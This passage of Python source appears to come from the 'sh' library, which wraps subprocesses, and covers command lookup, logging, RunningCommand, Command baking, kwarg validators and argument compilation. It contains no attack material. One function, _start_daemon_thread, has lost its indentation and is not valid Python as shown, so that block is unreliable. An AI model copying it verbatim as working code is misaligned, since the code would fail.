    def __init__(self, path, results):
        self.path = path
        list.__init__(self, results)

def glob(path, *args, **kwargs):
    # drop-in replacement for glob.glob whose results carry the pattern
    expanded = GlobResults(path, _old_glob(path, *args, **kwargs))
    return expanded

glob_module.glob = glob
def canonicalize(path):
    """ expand a leading ~ and return an absolute version of *path* """
    expanded = os.path.expanduser(path)
    return os.path.abspath(expanded)
def which(program, paths=None):
    """ takes a program name or full path, plus an optional collection of search
    paths, and returns the full path of the requested executable. if paths is
    specified, it is the entire list of search paths, and the PATH env is not
    used at all. otherwise, PATH env is used to look for the program """

    def is_exe(file_path):
        # must exist, be executable by us, and resolve to a regular file
        return (os.path.exists(file_path) and
                os.access(file_path, os.X_OK) and
                os.path.isfile(os.path.realpath(file_path)))

    directory, _ = os.path.split(program)

    # a path component means the caller specified an explicit location; just
    # test that location and nothing else
    if directory:
        program = canonicalize(program)
        return program if is_exe(program) else None

    # bare program name: scan the search paths in order
    if isinstance(paths, (tuple, list)):
        search_dirs = list(paths)
    else:
        search_dirs = os.environ.get("PATH", "").split(os.pathsep)

    for candidate_dir in search_dirs:
        candidate = os.path.join(canonicalize(candidate_dir), program)
        if is_exe(candidate):
            return candidate
    return None
def resolve_command_path(program):
    """ locate *program* on PATH, returning its full path or None.

    our actual command might have a dash in it, but we can't call that from
    python (we have to use underscores), so if the underscore name isn't
    found we also try a dashed variant """
    path = which(program)
    if path:
        return path
    if "_" in program:
        path = which(program.replace("_", "-"))
    return path or None
def resolve_command(name, baked_args=None):
    """ build a Command for *name*, or None if it can't be found. baked_args,
    when given, are pre-applied (baked) onto the returned command """
    path = resolve_command_path(name)
    if not path:
        return None
    cmd = Command(path)
    return cmd.bake(**baked_args) if baked_args else cmd
class Logger(object):
    """ a memory-inexpensive logger wrapper.

    python's builtin logger objects are never garbage collected, so creating
    one uniquely-named logger per command invocation (e.g. "ls -l /tmp")
    would accumulate forever. instead we keep a small number of generically
    named loggers (e.g. "command") and carry the unique per-invocation part
    as a "context" string that gets prefixed onto every message. """

    def __init__(self, name, context=None):
        self.name = name
        self.log = logging.getLogger("%s.%s" % (SH_LOGGER_NAME, name))
        self.context = self.sanitize_context(context)

    @staticmethod
    def sanitize_context(context):
        # escape "%" so the context survives the %-formatting in _format_msg
        if context:
            context = context.replace("%", "%%")
        return context or ""

    def get_child(self, name, context):
        # derive a logger one level deeper, extending both name and context
        return Logger(self.name + "." + name, self.context + "." + context)

    def _format_msg(self, msg, *a):
        if self.context:
            msg = "%s: %s" % (self.context, msg)
        return msg % a

    def info(self, msg, *a):
        self.log.info(self._format_msg(msg, *a))

    def debug(self, msg, *a):
        self.log.debug(self._format_msg(msg, *a))

    def error(self, msg, *a):
        self.log.error(self._format_msg(msg, *a))

    def exception(self, msg, *a):
        self.log.exception(self._format_msg(msg, *a))
def default_logger_str(cmd, call_args, pid=None):
    """ render the default logging-context string for a command, including
    the pid once the process has been spawned """
    if pid:
        return "<Command %r, pid %d>" % (cmd, pid)
    return "<Command %r>" % cmd
class RunningCommand(object):
    """ this represents an executing Command object. it is returned as the
    result of __call__() being executed on a Command instance. this creates a
    reference to a OProc instance, which is a low-level wrapper around the
    process that was exec'd

    this is the class that gets manipulated the most by user code, and so it
    implements various convenience methods and logical mechanisms for the
    underlying process. for example, if a user tries to access a
    backgrounded-process's stdout/err, the RunningCommand object is smart enough
    to know to wait() on the process to finish first. and when the process
    finishes, RunningCommand is smart enough to translate exit codes to
    exceptions. """

    # these are attributes that we allow to pass through to OProc
    _OProc_attr_whitelist = set((
        "signal",
        "terminate",
        "kill",
        "kill_group",
        "signal_group",
        "pid",
        "sid",
        "pgid",
        "ctty",
        "input_thread_exc",
        "output_thread_exc",
        "bg_thread_exc",
    ))

    def __init__(self, cmd, call_args, stdin, stdout, stderr):
        """
        cmd is a list, where each element is encoded as bytes (PY3) or str (PY2)
        """
        # self.ran is used for auditing what actually ran. for example, in
        # exceptions, or if you just want to know what was ran after the
        # command ran
        #
        # here we're making a consistent unicode string out if our cmd.
        # we're also assuming (correctly, i think) that the command and its
        # arguments are the encoding we pass into _encoding, which falls back to
        # the system's encoding
        enc = call_args["encoding"]
        self.ran = " ".join([shlex_quote(arg.decode(enc, "ignore")) for arg in cmd])

        self.call_args = call_args
        self.cmd = cmd

        self.process = None
        self._waited_until_completion = False
        should_wait = True
        spawn_process = True

        # this is used to track if we've already raised StopIteration, and if we
        # have, raise it immediately again if the user tries to call next() on
        # us. https://github.com/amoffat/sh/issues/273
        self._stopped_iteration = False

        # with contexts shouldn't run at all yet, they prepend
        # to every command in the context
        if call_args["with"]:
            spawn_process = False
            get_prepend_stack().append(self)

        if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]:
            should_wait = False

        # we're running in the background, return self and let us lazily
        # evaluate
        if call_args["bg"]:
            should_wait = False

        # redirection
        if call_args["err_to_out"]:
            stderr = OProc.STDOUT

        done_callback = call_args["done"]
        if done_callback:
            call_args["done"] = partial(done_callback, self)

        # set up which stream should write to the pipe
        # TODO, make pipe None by default and limit the size of the Queue
        # in oproc.OProc
        pipe = OProc.STDOUT
        if call_args["iter"] == "out" or call_args["iter"] is True:
            pipe = OProc.STDOUT
        elif call_args["iter"] == "err":
            pipe = OProc.STDERR

        # note: _iter_noblock takes precedence over _iter for pipe selection
        if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True:
            pipe = OProc.STDOUT
        elif call_args["iter_noblock"] == "err":
            pipe = OProc.STDERR

        # there's currently only one case where we wouldn't spawn a child
        # process, and that's if we're using a with-context with our command
        self._spawned_and_waited = False
        if spawn_process:
            log_str_factory = call_args["log_msg"] or default_logger_str
            logger_str = log_str_factory(self.ran, call_args)
            self.log = Logger("command", logger_str)

            self.log.debug("starting process")

            if should_wait:
                self._spawned_and_waited = True

            # this lock is needed because of a race condition where a background
            # thread, created in the OProc constructor, may try to access
            # self.process, but it has not been assigned yet
            process_assign_lock = threading.Lock()
            with process_assign_lock:
                self.process = OProc(self, self.log, cmd, stdin, stdout, stderr,
                                     self.call_args, pipe, process_assign_lock)

            # re-render the logging context now that we know the pid
            logger_str = log_str_factory(self.ran, call_args, self.process.pid)
            self.log.context = self.log.sanitize_context(logger_str)
            self.log.info("process started")

            if should_wait:
                self.wait()

    def wait(self, timeout=None):
        """ waits for the running command to finish. this is called on all
        running commands, eventually, except for ones that run in the background

        if timeout is a number, it is the number of seconds to wait for the process to resolve. otherwise block on wait.

        this function can raise a TimeoutException, either because of a `_timeout` on the command itself as it was
        launched, or because of a timeout passed into this method.
        """
        if not self._waited_until_completion:
            # if we've been given a timeout, we need to poll is_alive()
            if timeout is not None:
                waited_for = 0
                sleep_amt = 0.1
                alive = False
                exit_code = None
                if timeout < 0:
                    raise RuntimeError("timeout cannot be negative")

                # while we still have time to wait, run this loop
                # notice that alive and exit_code are only defined in this loop, but the loop is also guaranteed to run,
                # defining them, given the constraints that timeout is non-negative
                while waited_for <= timeout:
                    alive, exit_code = self.process.is_alive()
                    # if we're alive, we need to wait some more, but let's sleep before we poll again
                    if alive:
                        time.sleep(sleep_amt)
                        waited_for += sleep_amt
                    # but if we're not alive, we're done waiting
                    else:
                        break

                # if we've made it this far, and we're still alive, then it means we timed out waiting
                if alive:
                    raise TimeoutException(None, self.ran)

                # if we didn't time out, we fall through and let the rest of the code handle exit_code.
                # notice that we set _waited_until_completion here, only if we didn't time out. this allows us to
                # re-wait again on timeout, if we catch the TimeoutException in the parent frame
                self._waited_until_completion = True

            else:
                exit_code = self.process.wait()
                self._waited_until_completion = True

            if self.process.timed_out:
                # if we timed out, our exit code represents a signal, which is
                # negative, so let's make it positive to store in our
                # TimeoutException
                raise TimeoutException(-exit_code, self.ran)
            else:
                self.handle_command_exit_code(exit_code)

            # if an iterable command is using an instance of OProc for its stdin,
            # wait on it. the process is probably set to "piped", which means it
            # won't be waited on, which means exceptions won't propagate up to the
            # main thread. this allows them to bubble up
            if self.process._stdin_process:
                self.process._stdin_process.command.wait()

        self.log.debug("process completed")
        return self

    def is_alive(self):
        """ returns whether or not we're still alive. this call has side-effects on OProc """
        return self.process.is_alive()[0]

    def handle_command_exit_code(self, code):
        """ here we determine if we had an exception, or an error code that we
        weren't expecting to see. if we did, we create and raise an exception
        """
        ca = self.call_args
        exc_class = get_exc_exit_code_would_raise(code, ca["ok_code"], ca["piped"])
        if exc_class:
            exc = exc_class(self.ran, self.process.stdout, self.process.stderr, ca["truncate_exc"])
            raise exc

    @property
    def stdout(self):
        # accessing captured output implicitly waits for completion
        self.wait()
        return self.process.stdout

    @property
    def stderr(self):
        self.wait()
        return self.process.stderr

    @property
    def exit_code(self):
        self.wait()
        return self.process.exit_code

    def __len__(self):
        return len(str(self))

    def __enter__(self):
        """ we don't actually do anything here because anything that should have
        been done would have been done in the Command.__call__ call.
        essentially all that has to happen is the command be pushed on the
        prepend stack. """
        pass

    def __iter__(self):
        return self

    def next(self):
        """ allow us to iterate over the output of our command """
        if self._stopped_iteration:
            raise StopIteration()

        # we do this because if get blocks, we can't catch a KeyboardInterrupt
        # so the slight timeout allows for that.
        while True:
            try:
                chunk = self.process._pipe_queue.get(True, self.call_args["iter_poll_time"])
            except Empty:
                if self.call_args["iter_noblock"]:
                    return errno.EWOULDBLOCK
            else:
                # a None chunk is the sentinel for end-of-output
                if chunk is None:
                    self.wait()
                    self._stopped_iteration = True
                    raise StopIteration()
                try:
                    return chunk.decode(self.call_args["encoding"], self.call_args["decode_errors"])
                except UnicodeDecodeError:
                    return chunk

    # python 3
    __next__ = next

    def __exit__(self, exc_type, exc_val, exc_tb):
        if self.call_args["with"] and get_prepend_stack():
            get_prepend_stack().pop()

    def __str__(self):
        """ in python3, should return unicode. in python2, should return a
        string of bytes """
        if IS_PY3:
            return self.__unicode__()
        else:
            return unicode(self).encode(self.call_args["encoding"])

    def __unicode__(self):
        """ a magic method defined for python2. calling unicode() on a
        RunningCommand object will call this """
        if self.process and self.stdout:
            return self.stdout.decode(self.call_args["encoding"], self.call_args["decode_errors"])
        elif IS_PY3:
            return ""
        else:
            return unicode("")

    def __eq__(self, other):
        return unicode(self) == unicode(other)
    __hash__ = None  # Avoid DeprecationWarning in Python < 3

    def __contains__(self, item):
        return item in str(self)

    def __getattr__(self, p):
        # let these three attributes pass through to the OProc object
        if p in self._OProc_attr_whitelist:
            if self.process:
                return getattr(self.process, p)
            else:
                raise AttributeError

        # see if strings have what we're looking for. we're looking at the
        # method names explicitly because we don't want to evaluate self unless
        # we absolutely have to, the reason being, in python2, hasattr swallows
        # exceptions, and if we try to run hasattr on a command that failed and
        # is being run with _iter=True, the command will be evaluated, throw an
        # exception, but hasattr will discard it
        if p in _unicode_methods:
            return getattr(unicode(self), p)

        raise AttributeError

    def __repr__(self):
        """ in python3, should return unicode. in python2, should return a
        string of bytes """
        try:
            return str(self)
        except UnicodeDecodeError:
            if self.process:
                if self.stdout:
                    return repr(self.stdout)
            return repr("")

    def __long__(self):
        return long(str(self).strip())

    def __float__(self):
        return float(str(self).strip())

    def __int__(self):
        return int(str(self).strip())
def output_redirect_is_filename(out):
    # an _out/_err target given as a string is interpreted as a filename
    return isinstance(out, basestring)
def get_prepend_stack():
    """ per-thread stack of with-context commands that get prepended onto
    every command run inside the context; created lazily on first use """
    tl = Command.thread_local
    try:
        return tl._prepend_stack
    except AttributeError:
        tl._prepend_stack = []
        return tl._prepend_stack
def special_kwarg_validator(passed_kwargs, merged_kwargs, invalid_list):
    """ run every validator in *invalid_list* against the special kwargs.

    each entry is either a callable(passed_kwargs, merged_kwargs) returning a
    list of (names, error_msg) failures, or a (names, error_msg) pair that
    fails when all of *names* were passed together. returns the combined
    failure list """
    passed_names = set(passed_kwargs.keys())
    invalid_args = []

    for validator in invalid_list:
        if callable(validator):
            invalid_args.extend(validator(passed_kwargs, merged_kwargs))
        else:
            names, error_msg = validator
            if passed_names.issuperset(names):
                invalid_args.append((names, error_msg))

    return invalid_args
def get_fileno(ob):
    """ best-effort file descriptor for *ob*: calls its fileno() when it has
    one, accepts a non-negative int as a raw fd, and returns None otherwise.

    note that in py3 some objects (StringIO) expose a fileno method that
    raises when called -- that also yields None """
    fileno_meth = getattr(ob, "fileno", None)
    if fileno_meth:
        try:
            return fileno_meth()
        except UnsupportedOperation:
            return None
    if isinstance(ob, (int, long)) and ob >= 0:
        return ob
    return None
def ob_is_fd_based(ob):
    # true when *ob* is (or wraps) a real OS file descriptor
    return get_fileno(ob) is not None
def ob_is_tty(ob):
    """ checks if an object (like a file-like object) is a tty. """
    fd = get_fileno(ob)
    return os.isatty(fd) if fd is not None else False
def ob_is_pipe(ob):
    """ checks if an object (a file-like object or a raw fd) refers to an OS
    pipe/FIFO """
    fileno = get_fileno(ob)
    is_pipe = False
    # fix: compare against None instead of relying on truthiness. fd 0
    # (stdin) is a valid descriptor but falsy, so it was previously reported
    # as "not a pipe" without ever being checked -- note the sibling
    # ob_is_tty() above already uses the `is not None` form.
    if fileno is not None:
        fd_stat = os.fstat(fileno)
        is_pipe = stat.S_ISFIFO(fd_stat.st_mode)
    return is_pipe
def tty_in_validator(passed_kwargs, merged_kwargs):
    """ validate the tty-related special kwargs.

    here we'll validate that people aren't randomly shotgun-debugging different tty options and hoping that they'll
    work, without understanding what they do """
    pairs = (("tty_in", "in"), ("tty_out", "out"))
    invalid = []
    for tty_type, std in pairs:
        # asking sh to allocate a TTY for a stream that is already a TTY is
        # a sign of confusion
        if tty_type in passed_kwargs and ob_is_tty(passed_kwargs.get(std, None)):
            # fix: removed the duplicated word ("so so") from the error message
            error = "`_%s` is a TTY already, so it doesn't make sense to set up a TTY with `_%s`" % (std, tty_type)
            invalid.append(((tty_type, std), error))

    # if unify_ttys is set, then both tty_in and tty_out must both be True
    if merged_kwargs["unify_ttys"] and not (merged_kwargs["tty_in"] and merged_kwargs["tty_out"]):
        invalid.append((
            ("unify_ttys", "tty_in", "tty_out"),
            "`_tty_in` and `_tty_out` must both be True if `_unify_ttys` is True"
        ))

    return invalid
def fg_validator(passed_kwargs, merged_kwargs):
    """ _fg cannot be combined with most other special kwargs; only env, cwd
    (and fg itself) are tolerated alongside it """
    msg = """\
_fg is invalid with nearly every other option, see warning and workaround here:
https://amoffat.github.io/sh/sections/special_arguments.html#fg"""
    allowed = set(("env", "fg", "cwd"))
    offending = set(passed_kwargs.keys()) - allowed

    invalid = []
    if passed_kwargs.get("fg") and offending:
        invalid.append(("fg", msg))
    return invalid
def bufsize_validator(passed_kwargs, merged_kwargs):
    """ a validator to prevent a user from saying that they want custom
    buffering when they're using an in/out object that will be os.dup'ed to the
    process, and has its own buffering. an example is a pipe or a tty. it
    doesn't make sense to tell them to have a custom buffering, since the os
    controls this. """
    err_tpl = "Can't specify an {target} bufsize if the {target} target is a pipe or TTY"
    invalid = []

    # same check for stdin and stdout redirection targets
    for target in ("in", "out"):
        redirect_ob = passed_kwargs.get(target, None)
        bufsize = passed_kwargs.get(target + "_bufsize", None)
        if ob_is_fd_based(redirect_ob) and bufsize is not None:
            invalid.append(((target, target + "_bufsize"), err_tpl.format(target=target)))

    return invalid
def env_validator(passed_kwargs, merged_kwargs):
    """ a validator to check that env is a dictionary and that all environment variable
    keys and values are strings. Otherwise, we would exit with a confusing exit code 255. """
    env = passed_kwargs.get("env", None)
    # no env passed: nothing to validate
    if env is None:
        return []

    # env must be a mapping before we can inspect keys/values
    if not isinstance(env, Mapping):
        return [("env", "env must be dict-like. Got {!r}".format(env))]

    problems = []
    for key, value in env.items():
        if not isinstance(key, str):
            problems.append(("env", "env key {!r} must be a str".format(key)))
        if not isinstance(value, str):
            problems.append(("env", "value {!r} of env key {!r} must be a str".format(value, key)))
    return problems
class Command(object):
    """ represents an un-run system program, like "ls" or "cd". because it
    represents the program itself (and not a running instance of it), it should
    hold very little state. in fact, the only state it does hold is baked
    arguments.

    when a Command object is called, the result that is returned is a
    RunningCommand object, which represents the Command put into an execution
    state. """

    # per-thread storage; used by the module's `_with` prepend-stack machinery
    thread_local = threading.local()

    # defaults for every special `_`-prefixed keyword argument a Command call
    # accepts. _extract_call_args() pulls these out of the kwargs passed to
    # __call__, and the validators below sanity-check the combinations.
    _call_args = {
        "fg": False,  # run command in foreground

        # run a command in the background. commands run in the background
        # ignore SIGHUP and do not automatically exit when the parent process
        # ends
        "bg": False,

        # automatically report exceptions for background commands
        "bg_exc": True,

        "with": False,  # prepend the command to every command after it
        "in": None,
        "out": None,  # redirect STDOUT
        "err": None,  # redirect STDERR
        "err_to_out": None,  # redirect STDERR to STDOUT

        # stdin buffer size
        # 1 for line, 0 for unbuffered, any other number for that amount
        "in_bufsize": 0,
        # stdout buffer size, same values as above
        "out_bufsize": 1,
        "err_bufsize": 1,

        # this is how big the output buffers will be for stdout and stderr.
        # this is essentially how much output they will store from the process.
        # we use a deque, so if it overflows past this amount, the first items
        # get pushed off as each new item gets added.
        #
        # NOTICE
        # this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if
        # you're buffering out/err at 1024 bytes, the internal buffer size will
        # be "internal_bufsize" CHUNKS of 1024 bytes
        "internal_bufsize": 3 * 1024 ** 2,

        "env": None,
        "piped": None,
        "iter": None,
        "iter_noblock": None,
        # the amount of time to sleep between polling for the iter output queue
        "iter_poll_time": 0.1,
        "ok_code": 0,
        "cwd": None,

        # the separator delimiting between a long-argument's name and its value
        # setting this to None will cause name and value to be two separate
        # arguments, like for short options
        # for example, --arg=derp, '=' is the long_sep
        "long_sep": "=",

        # the prefix used for long arguments
        "long_prefix": "--",

        # this is for programs that expect their input to be from a terminal.
        # ssh is one of those programs
        "tty_in": False,
        "tty_out": True,
        "unify_ttys": False,

        "encoding": DEFAULT_ENCODING,
        "decode_errors": "strict",

        # how long the process should run before it is auto-killed
        "timeout": None,
        "timeout_signal": signal.SIGKILL,

        # TODO write some docs on "long-running processes"
        # these control whether or not stdout/err will get aggregated together
        # as the process runs. this has memory usage implications, so sometimes
        # with long-running processes with a lot of data, it makes sense to
        # set these to true
        "no_out": False,
        "no_err": False,
        "no_pipe": False,

        # if any redirection is used for stdout or stderr, internal buffering
        # of that data is not stored. this forces it to be stored, as if
        # the output is being T'd to both the redirected destination and our
        # internal buffers
        "tee": None,

        # will be called when a process terminates regardless of exception
        "done": None,

        # a tuple (rows, columns) of the desired size of both the stdout and
        # stdin ttys, if ttys are being used
        "tty_size": (20, 80),

        # whether or not our exceptions should be truncated
        "truncate_exc": True,

        # a function to call after the child forks but before the process execs
        "preexec_fn": None,

        # UID to set after forking. Requires root privileges. Not supported on
        # Windows.
        "uid": None,

        # put the forked process in its own process session?
        "new_session": True,

        # pre-process args passed into __call__. only really useful when used
        # in .bake()
        "arg_preprocess": None,

        # a callable that produces a log message from an argument tuple of the
        # command and the args
        "log_msg": None,

        # whether or not to close all inherited fds. typically, this should be True, as inheriting fds can be a security
        # vulnerability
        "close_fds": True,

        # a whitelist of the integer fds to pass through to the child process. setting this forces close_fds to be True
        "pass_fds": set(),
    }

    # this is a collection of validators to make sure the special kwargs make
    # sense
    _kwarg_validators = (
        (("err", "err_to_out"), "Stderr is already being redirected"),
        (("piped", "iter"), "You cannot iterate when this command is being piped"),
        (("piped", "no_pipe"), "Using a pipe doesn't make sense if you've disabled the pipe"),
        (("no_out", "iter"), "You cannot iterate over output if there is no output"),
        (("close_fds", "pass_fds"), "Passing `pass_fds` forces `close_fds` to be True"),
        tty_in_validator,
        bufsize_validator,
        env_validator,
        fg_validator,
    )

    def __init__(self, path, search_paths=None):
        """Resolve *path* to an executable (searching only *search_paths* if
        given) and remember it. Raises CommandNotFound when the program cannot
        be located."""
        found = which(path, search_paths)

        # placeholder; overwritten below once we know the lookup succeeded
        self._path = encode_to_py3bytes_or_py2str("")

        # is the command baked (aka, partially applied)?
        self._partial = False
        self._partial_baked_args = []
        self._partial_call_args = {}

        # bugfix for functools.wraps. issue #121
        self.__name__ = str(self)

        if not found:
            raise CommandNotFound(path)

        # the reason why we set the values early in the constructor, and again
        # here, is for people who have tools that inspect the stack on
        # exception. if CommandNotFound is raised, we need self._path and the
        # other attributes to be set correctly, so repr() works when they're
        # inspecting the stack. issue #304
        self._path = encode_to_py3bytes_or_py2str(found)
        self.__name__ = str(self)

    def __getattribute__(self, name):
        """Attribute access doubles as subcommand baking: ``git.branch``
        returns ``git.bake("branch")``. Underscore-private names and ``bake``
        itself resolve normally."""
        # convenience
        get_attr = partial(object.__getattribute__, self)
        val = None

        if name.startswith("_"):
            val = get_attr(name)

        elif name == "bake":
            val = get_attr("bake")

        # here we have a way of getting past shadowed subcommands. for example,
        # if "git bake" was a thing, we wouldn't be able to do `git.bake()`
        # because `.bake()` is already a method. so we allow `git.bake_()`
        elif name.endswith("_"):
            name = name[:-1]

        if val is None:
            val = get_attr("bake")(name)

        return val

    @staticmethod
    def _extract_call_args(kwargs):
        """ takes kwargs that were passed to a command's __call__ and extracts
        out the special keyword arguments, we return a tuple of special keyword
        args, and kwargs that will go to the exec'ed command """
        kwargs = kwargs.copy()
        call_args = {}

        # special kwargs are the `_`-prefixed versions of the _call_args keys
        for parg, default in Command._call_args.items():
            key = "_" + parg

            if key in kwargs:
                call_args[parg] = kwargs[key]
                del kwargs[key]

        merged_args = Command._call_args.copy()
        merged_args.update(call_args)
        invalid_kwargs = special_kwarg_validator(call_args, merged_args, Command._kwarg_validators)

        if invalid_kwargs:
            exc_msg = []
            for kwarg, error_msg in invalid_kwargs:
                exc_msg.append(" %r: %s" % (kwarg, error_msg))
            exc_msg = "\n".join(exc_msg)
            raise TypeError("Invalid special arguments:\n\n%s\n" % exc_msg)

        return call_args, kwargs

    # TODO needs documentation
    def bake(self, *args, **kwargs):
        """Return a new Command with *args*/*kwargs* partially applied; they
        are prepended on every future call. Special kwargs whose values equal
        the defaults are pruned so they don't needlessly override."""
        fn = type(self)(self._path)
        fn._partial = True

        call_args, kwargs = self._extract_call_args(kwargs)

        # drop special kwargs that just restate the defaults
        pruned_call_args = call_args
        for k, v in Command._call_args.items():
            try:
                if pruned_call_args[k] == v:
                    del pruned_call_args[k]
            except KeyError:
                continue

        fn._partial_call_args.update(self._partial_call_args)
        fn._partial_call_args.update(pruned_call_args)
        fn._partial_baked_args.extend(self._partial_baked_args)
        sep = pruned_call_args.get("long_sep", self._call_args["long_sep"])
        prefix = pruned_call_args.get("long_prefix", self._call_args["long_prefix"])
        fn._partial_baked_args.extend(compile_args(args, kwargs, sep, prefix))
        return fn

    def __str__(self):
        """ in python3, should return unicode. in python2, should return a
        string of bytes """
        if IS_PY3:
            return self.__unicode__()
        else:
            return self.__unicode__().encode(DEFAULT_ENCODING)

    def __eq__(self, other):
        # two commands are equal if they render to the same command string
        return str(self) == str(other)

    __hash__ = None  # Avoid DeprecationWarning in Python < 3

    def __repr__(self):
        """ in python3, should return unicode. in python2, should return a
        string of bytes """
        return "<Command %r>" % str(self)

    def __unicode__(self):
        """ a magic method defined for python2. calling unicode() on a
        self will call this """
        baked_args = " ".join(item.decode(DEFAULT_ENCODING) for item in self._partial_baked_args)
        if baked_args:
            baked_args = " " + baked_args
        return self._path.decode(DEFAULT_ENCODING) + baked_args

    def __enter__(self):
        # `_with=True` pushes this command onto the prepend stack so commands
        # run inside the `with` block are prefixed with it
        self(_with=True)

    def __exit__(self, exc_type, exc_val, exc_tb):
        get_prepend_stack().pop()

    def __call__(self, *args, **kwargs):
        """Execute the command. Returns a RunningCommand, or None when run in
        foreground mode (`_fg=True`). A RunningCommand as the first positional
        argument sets up piping from that command's output."""
        kwargs = kwargs.copy()
        args = list(args)

        # this will hold our final command, including arguments, that will be
        # exec'ed
        cmd = []

        # this will hold a complete mapping of all our special keyword arguments
        # and their values
        call_args = Command._call_args.copy()

        # aggregate any 'with' contexts
        for prepend in get_prepend_stack():
            pcall_args = prepend.call_args.copy()
            # don't pass the 'with' call arg
            pcall_args.pop("with", None)

            call_args.update(pcall_args)
            cmd.extend(prepend.cmd)

        cmd.append(self._path)

        # do we have an argument pre-processor? if so, run it. we need to do
        # this early, so that args, kwargs are accurate
        preprocessor = self._partial_call_args.get("arg_preprocess", None)
        if preprocessor:
            args, kwargs = preprocessor(args, kwargs)

        # here we extract the special kwargs and override any
        # special kwargs from the possibly baked command
        extracted_call_args, kwargs = self._extract_call_args(kwargs)

        call_args.update(self._partial_call_args)
        call_args.update(extracted_call_args)

        # handle a None. this is added back only to not break the api in the
        # 1.* version. TODO remove this in 2.0, as "ok_code", if specified,
        # should always be a definitive value or list of values, and None is
        # ambiguous
        if call_args["ok_code"] is None:
            call_args["ok_code"] = 0

        # normalize ok_code to a list so membership tests work uniformly
        if not getattr(call_args["ok_code"], "__iter__", None):
            call_args["ok_code"] = [call_args["ok_code"]]

        # check if we're piping via composition
        stdin = call_args["in"]
        if args:
            first_arg = args.pop(0)
            if isinstance(first_arg, RunningCommand):
                if first_arg.call_args["piped"]:
                    stdin = first_arg.process
                else:
                    stdin = first_arg.process._pipe_queue
            else:
                args.insert(0, first_arg)

        processed_args = compile_args(args, kwargs, call_args["long_sep"], call_args["long_prefix"])

        # makes sure our arguments are broken up correctly
        split_args = self._partial_baked_args + processed_args

        final_args = split_args

        cmd.extend(final_args)

        # if we're running in foreground mode, we need to completely bypass
        # launching a RunningCommand and OProc and just do a spawn
        if call_args["fg"]:
            cwd = call_args["cwd"] or os.getcwd()
            with pushd(cwd):
                if call_args["env"] is None:
                    exit_code = os.spawnv(os.P_WAIT, cmd[0], cmd)
                else:
                    exit_code = os.spawnve(os.P_WAIT, cmd[0], cmd, call_args["env"])

            exc_class = get_exc_exit_code_would_raise(exit_code, call_args["ok_code"], call_args["piped"])
            if exc_class:
                if IS_PY3:
                    ran = " ".join([arg.decode(DEFAULT_ENCODING, "ignore") for arg in cmd])
                else:
                    ran = " ".join(cmd)
                exc = exc_class(ran, b"", b"", call_args["truncate_exc"])
                raise exc
            return None

        # stdout redirection
        stdout = call_args["out"]
        if output_redirect_is_filename(stdout):
            stdout = open(str(stdout), "wb")

        # stderr redirection
        stderr = call_args["err"]
        if output_redirect_is_filename(stderr):
            stderr = open(str(stderr), "wb")

        return RunningCommand(cmd, call_args, stdin, stdout, stderr)
def compile_args(a, kwargs, sep, prefix):
    """Flatten positional args and kwargs into the final argv fragment.

    Example: ``sh.ls("-l", "/tmp", color="never")`` receives
    ``a=['-l', '/tmp']`` and ``kwargs={'color': 'never'}`` and produces
    ``['-l', '/tmp', '--color=never']``.
    """
    encode = encode_to_py3bytes_or_py2str
    compiled = []

    # positional arguments first, in order
    for arg in a:
        if isinstance(arg, (list, tuple)):
            # an empty glob result expands to its original pattern
            if isinstance(arg, GlobResults) and not arg:
                arg = [arg.path]
            compiled.extend(encode(sub_arg) for sub_arg in arg)

        elif isinstance(arg, dict):
            # dict args are long options with names used verbatim (raw)
            compiled += aggregate_keywords(arg, sep, prefix, raw=True)

        elif arg is None or arg is False:
            # silently dropped, see https://github.com/amoffat/sh/issues/522
            pass

        else:
            compiled.append(encode(arg))

    # then the keyword arguments
    compiled += aggregate_keywords(kwargs, sep, prefix)

    return compiled
def aggregate_keywords(keywords, sep, prefix, raw=False):
    """Compose keyword arguments into flat long (and short) options.

    ``{'color': 'never', 't': True, 'something': True}`` with sep '='
    becomes ``['--color=never', '-t', '--something']``.

    *raw* controls whether the argument name is left alone or has "_"
    replaced with "-". A dict passed positionally to a command sets raw=True
    (names used verbatim, e.g. ``--some_option=12``); ordinary kwargs use
    raw=False, so ``sh.command(some_option=12)`` yields ``--some-option=12``
    — a convenience, since kwargs can't contain a literal '-'.
    """
    encode = encode_to_py3bytes_or_py2str
    result = []

    for key, value in keywords.items():
        # single-letter kwarg -> short option, e.g. cut(d="\t") -> -d '\t'
        if len(key) == 1:
            if value is not False:
                result.append(encode("-" + key))
                if value is not True:
                    result.append(encode(value))
            continue

        # long option
        if not raw:
            key = key.replace("_", "-")

        if value is True:
            # bare flag, no value
            result.append(encode(prefix + key))
        elif value is False:
            # false flags are omitted entirely
            pass
        elif sep is None or sep == " ":
            # name and value emitted as two separate arguments
            result.append(encode(prefix + key))
            result.append(encode(value))
        else:
            # name and value joined by sep, e.g. --color=never
            result.append(encode("%s%s%s%s" % (prefix, key, sep, value)))

    return result
def _start_daemon_thread(fn, name, exc_queue, *a):
def wrap(*rgs, **kwargs):
try:
fn(*rgs, **kwargs)
except Exception as e:
exc_queue.put(e)
raise
thread = threading.Thread(target=wrap, name=name, args=a)
thread.daemon = True
thread.start()
return thread
def setwinsize(fd, rows_cols):
    """ set the terminal size of a tty file descriptor. borrowed logic
    from pexpect.py """
    rows, cols = rows_cols
    # fall back to a hard-coded ioctl request number on platforms where
    # termios doesn't expose TIOCSWINSZ
    request = getattr(termios, 'TIOCSWINSZ', -2146929561)
    packed = struct.pack('HHHH', rows, cols, 0, 0)
    fcntl.ioctl(fd, request, packed)
def construct_streamreader_callback(process, handler):
    """Build the closure used when _out/_err is a callback.

    The closure is shaped by how many arguments the user's handler accepts,
    so callers can start simple (just the chunk) and later also receive stdin
    and the process without the API limiting them.
    """
    # account for the implied "self" of bound methods, and for arguments
    # already bound by functools.partial, when counting the handler's
    # remaining parameters
    implied_arg = 0
    partial_args = 0
    handler_to_inspect = handler

    if isinstance(handler, partial):
        partial_args = len(handler.args)
        handler_to_inspect = handler.func

    if inspect.ismethod(handler_to_inspect):
        implied_arg = 1
        num_args = get_num_args(handler_to_inspect)
    elif inspect.isfunction(handler_to_inspect):
        num_args = get_num_args(handler_to_inspect)
    else:
        # an object instance with a __call__ method
        implied_arg = 1
        num_args = get_num_args(handler_to_inspect.__call__)

    net_args = num_args - implied_arg - partial_args

    if net_args == 2:
        # chunk, stdin
        handler_args = (process.stdin,)
    elif net_args == 3:
        # chunk, stdin, process. only a weakref to the process is stored, to
